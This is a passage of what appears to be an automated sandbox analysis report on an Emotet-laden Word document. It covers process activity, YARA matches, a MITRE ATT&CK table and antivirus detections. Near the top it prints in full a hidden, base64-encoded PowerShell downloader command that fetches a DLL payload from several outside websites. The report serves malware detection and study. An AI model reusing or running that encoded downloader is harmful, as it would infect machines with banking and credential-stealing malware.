nACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000E.00000002.2259337398.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2196520380.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2280487586.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2237290824.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205331752.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205236491.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2193792895.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2227039929.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2249797577.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2269533338.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2218317405.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2237360892.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2170071042.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2180978806.0000000000390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2227064696.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2270553779.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2248449232.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2280539965.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2346045466.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2216606355.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2193729394.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2281126017.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2206333470.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2216643199.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2258739528.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2180920287.0000000000370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2348582119.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2346073042.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2258693813.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2248357262.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2190752783.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2239757544.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2269461275.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2169962101.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2228163956.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 13.2.rundll32.exe.4c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.110000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.110000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.4c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools111	OS Credential Dumping	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting22	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information3	LSASS Memory	System Information Discovery15	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution3	Logon Script (Windows)	Logon Script (Windows)	Scripting22	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter211	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Security Software Discovery11	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell3	Network Logon Script	Network Logon Script	Masquerading21	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Io8ic2291n.doc	57%	Metadefender		Browse
Io8ic2291n.doc	89%	ReversingLabs	Document-Word.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	100%	Joe Sandbox ML
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	76%	Metadefender		Browse
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	93%	ReversingLabs	Win32.Trojan.EmotetCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.2.rundll32.exe.4c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.370000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
17.2.rundll32.exe.10000000.11.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.3b0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.390000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
17.2.rundll32.exe.2d0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.270000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.210000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.3b0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.2c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.250000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.240000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
6.2.rundll32.exe.200000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.3b0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
6.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.240000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
